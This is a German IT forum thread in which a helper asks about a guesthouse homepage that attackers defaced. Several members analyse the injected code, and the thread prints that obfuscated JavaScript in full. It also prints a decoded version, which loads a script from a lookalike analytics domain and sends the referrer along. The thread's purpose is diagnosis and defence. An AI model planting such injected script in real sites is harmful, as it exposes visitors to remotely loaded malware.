Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Privathomepage einer Pension mit Quelltext manipuliert

Mitglied: killinator007

killinator007 (Level 1) - Jetzt verbinden

02.06.2008, aktualisiert 03.06.2008, 5245 Aufrufe, 11 Kommentare

Hallo zusammen, so etwas ist mir noch nie untergekommen! Neulich rief mich eine besorgte Frau an und meint, das mit ihrer Homepage etwas nicht stimmt, Zitat: Sie ist komplett verschwunden.

Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>

Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?

MfG Michael
Mitglied: kaffeezombie
02.06.2008 um 10:47 Uhr
Du hast doch gar kein body!!!

Es ist gar kein Inhalt deklariert, somit kann auch nix angezeigt werden
Bitte warten ..
Mitglied: Jere
02.06.2008 um 11:02 Uhr
Die Website ist ja noch immer blank?
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.



Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)


@kaffeezombie: Was für ein geiler Nick! :D :D
Bitte warten ..
Mitglied: kaffeezombie
02.06.2008 um 11:13 Uhr
meine User gaben mir diesen Namen... sie haben eine gute beobachtunggabe )
Bitte warten ..
Mitglied: killinator007
02.06.2008 um 11:55 Uhr
Hallo, das Script funktioniert anscheinend nicht immer! mir wurde die installation eines ActiveX Steuerelementes angezeigt, welches eine Art Trojaner enthält. Diese Seiten sind eh schon bekannt mit den Texten "Auf ihren PC wurde Spyware entdeckt, bla,bla"
Bitte warten ..
Mitglied: LordGurke
02.06.2008 um 12:09 Uhr
Beim ersten Aufruf der Seite wurde ich auch auf http://58.65.234.163/e/count.php weitergeleitet - vermutlich durch das ominöse Script, weshalb vermutlich auch kein body-Tag mehr da ist, damit die Weiterleitung reibungslos funktioniert.

Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Bitte warten ..
Mitglied: Arano
02.06.2008 um 13:20 Uhr
Ich war neugierig und habe mir das Skript mal angesehen und "auseinander" genommen.
01.
<script language=javascript> 
02.
  pgwnl="%"; 
03.
  xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>"; 
04.
  fsb=unescape(xlbpi.replace(/Y/g,pgwnl)); 
05.
  var hvx,qm; 
06.
  //document.write(fsb); 
07.
  alert(fsb); 
08.
  hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">="; 
09.
   
10.
  ckzoq(hvx); 
11.
   
12.
   
13.
   
14.
   
15.
  // xlbpi bzw. fsb = 
16.
  function ckzoq(pot){ 
17.
           var ah, 
18.
               k  ="(*CcvGq-m$.kyZOsVIH8[puF}&@#T`;t\"763]_i'JUzwA+Mn1^EN5xal2o:!bPBhe{rdf|)K =0jg9~4,", 
19.
               a  ="", 
20.
               gbk, 
21.
               ru, 
22.
               tza="", 
23.
               db; 
24.
           for(ah=0;ah<pot.length;ah++){ 
25.
               gbk=pot.charAt(ah); 
26.
               ru =k.indexOf(gbk); 
27.
               if(ru>-1){ 
28.
                  db=((ru+1)%81-1); 
29.
                  if(db<=0) 
30.
                     db+=81; 
31.
                  tza+=k.charAt(db-1); 
32.
33.
                  else tza+=gbk; 
34.
35.
           a+=tza; 
36.
           //document.write(a); 
37.
           alert(a); 
38.
39.
            
40.
            
41.
  // ckzoq(hvx) = 
42.
  document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" );  
43.
   
44.
</script>
Zuerst werden alle "Y" die in der Variable xlbpi enthalten sind durch "%" ersetzt, danach wird der Inhalt unescapt und ergibt den JS-Code für die Funktion ckzog() die anschließend in das Dokument geschrieben wird (inkl. <script>-tags).
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.

Also definitive Schadcode ! (wurde ja auch schon erwähnt)

Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.

Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.

~Arano
Bitte warten ..
Mitglied: filippg
02.06.2008 um 19:36 Uhr
Hallo,

es ist nicht schön Kundendaten im Internet preiszugeben.

Gruß

Filipp
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 12:03 Uhr
Wer gibt heir Kundendaten preis? Es ist eine öffentliche Website!

Gruß Michael
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 12:18 Uhr
Danke für deine Mühe, dass Script zu zerlegen! ich gehe auch davon aus, das der FTP Account geknackt wurde.

Ist hald ärgerlich

Gruß

Michael
Bitte warten ..
Mitglied: filippg
03.06.2008 um 20:50 Uhr
Hallo,

du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).

Gruß

Filipp
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 23:31 Uhr
Hi Filipp

was dass mit der Website betrifft hasr du recht, nur, was nützt dir das? Das du irgendwie an meine E-mail Adresse kommen kannst und meinen Namen evtl. im Telefonbuch findest, naja kann doch sein. Außerdem bekomme ich schon genug SPAM ;) Nein, näturlich möchte das nicht unbedingt jeder.

Ich werde nächstes mal keine personenbezogene Daten mehr Posten (war so nicht richtig), auch wenn es grundsätzlich eine öffentliche Website ist und ich weder Zugang noch Passwort gesendet habe!

Sorry

Gruß

Michael
Bitte warten ..
Ähnliche Inhalte
Java
Quelltext - Java
Frage von jajatvJava2 Kommentare

Hallo liebes Forum, ich habe ein Frage und zwar suche ich einen Code wie ich von mehreren Seiten, den ...

LAN, WAN, Wireless
WLAN HotSpot Pension
Frage von ReisigLAN, WAN, Wireless10 Kommentare

Hallo, was könnt ihr für ein WLAN HotSpot Anbieter/Hardware für eine 10-15 Gäste Pension empfehlen? Sorglosinternet, Meinhotspot oder Airfy? ...

Batch & Shell
Wert aus Quelltext einer HP lesen
gelöst Frage von Nilbo91Batch & Shell11 Kommentare

Hallo zusammen! Wünsche erstmal ein frohes neues Jahr. Kurze Infos zu mir da ich neu in diesem Forum bin: ...

Humor (lol)
Quelltext, made my day
Frage von sabinesHumor (lol)9 Kommentare

Moin, mal was schönes zum Wochenstart. Aus meiner ehemaligen Selbständigkeit ruft mich eben ein Kunde an, er habe ich ...

Neue Wissensbeiträge
Humor (lol)

WhatsApp-Nachrichten endlich auch per Bluetooth versendbar

Information von BassFishFox vor 14 StundenHumor (lol)3 Kommentare

Genau darauf habe ich gewartet! ;-) Der beliebte Messaging-Dienst WhatsApp erhält eine praktische neue Funktion: Ab dem nächsten Update ...

Google Android

Googles "Android Enterprise Recommended" für Unternehmen

Information von kgborn vor 1 TagGoogle Android3 Kommentare

Hier eine Information, die für Administratoren und Verantwortliche in Unternehmen, die für die Beschaffung und das Rollout von Android-Geräten ...

Sicherheit

Intel gibt neue Spectre V2-Microcode-Updates frei (20.02.2018)

Information von kgborn vor 1 TagSicherheit

Intel hat zum 20. Februar 2018 weitere Microcode-Updates für OEMs freigegeben, um Systeme mit neueren Prozessoren gegen die Spectre ...

Microsoft
ARD-Doku - Das Microsoft Dilemma
Tipp von Knorkator vor 1 TagMicrosoft3 Kommentare

Hallo zusammen, vor einigen Tagen lief in der ARD u.a. Reportage. Das Youtube Video dazu dürfte länger verfügbar sein. ...

Heiß diskutierte Inhalte
Server-Hardware
Welche Rolle spielt Design bei Enterprise IT Hardware?
Frage von ApolloXServer-Hardware16 Kommentare

Ich arbeite für einen internationalen Elektronikhersteller in der Forschung und meine Aufgabe ist es, Feedback von Nutzern in Hinsicht ...

Windows Netzwerk
WSUS4 und Windows 10 Updates automatisch installieren
Frage von sammy65Windows Netzwerk15 Kommentare

Hallo miteinander, ich habe mit einen neuen WSUS Server aufgesetzt Server 2016 darauf einen aktuellen WSUS. Grund, wir stellen ...

Switche und Hubs
Cisco SG350X-48 AdminIP in anderes VLAN
Frage von lcer00Switche und Hubs14 Kommentare

Hallo zusammen, ich habe ein Problem mir einem Cisco SG350X-48 bei der Erstinstallation wurde eine IP 192.168.0.254 (Default VLAN ...

Windows Netzwerk
Backup über WAN
Frage von petereWindows Netzwerk11 Kommentare

Hallo, ich muss aus einem entfernten WAN (synchrone 1Gbit) Daten sichern. Dabei handelt es sich sowohl um wenige große ...